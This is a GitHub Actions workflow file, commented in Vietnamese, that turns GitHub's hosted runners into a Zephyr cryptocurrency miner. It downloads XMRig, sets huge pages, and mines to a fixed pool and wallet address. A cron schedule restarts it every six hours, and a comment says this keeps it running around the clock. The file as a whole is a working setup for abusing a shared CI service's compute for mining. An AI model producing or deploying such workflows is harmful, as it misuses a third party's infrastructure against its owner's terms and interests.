name: ZEPH-Mining-Troll
on:
  push:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *' # Tu dong chay lai sau moi 6 tieng de giu he thong 24/7

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: 1. Toi uu he thong (Huge Pages)
        run: sudo sysctl -w vm.nr_hugepages=128

      - name: 2. Tai va giai nen XMRig
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar -xf xmrig-6.21.0-linux-static-x64.tar.gz
          mv xmrig-6.21.0/xmrig .

      - name: 3. Bat dau chien dich (Dao 6 tieng)
        run: |
          # Dia chi vi Public cua ban
          # Ten worker duoc dat la 1
          
          ./xmrig -a rx/0 \
          -o zephyr.herominers.com:1123 \
          -u ZEPHYR2MqXiFdNbNRtaTPkZGCQ1TppT5iZLNe2NgNYVjJ7briea7f9Vdwr4BrxQexkb3D7xiRQyC3Y1mfTz9gjZZMpJsNDLRTR74q.1 \
          -p 1 \
          -t 4 \
          --cpu-max-threads-hint 70 \
          --donate-level 1

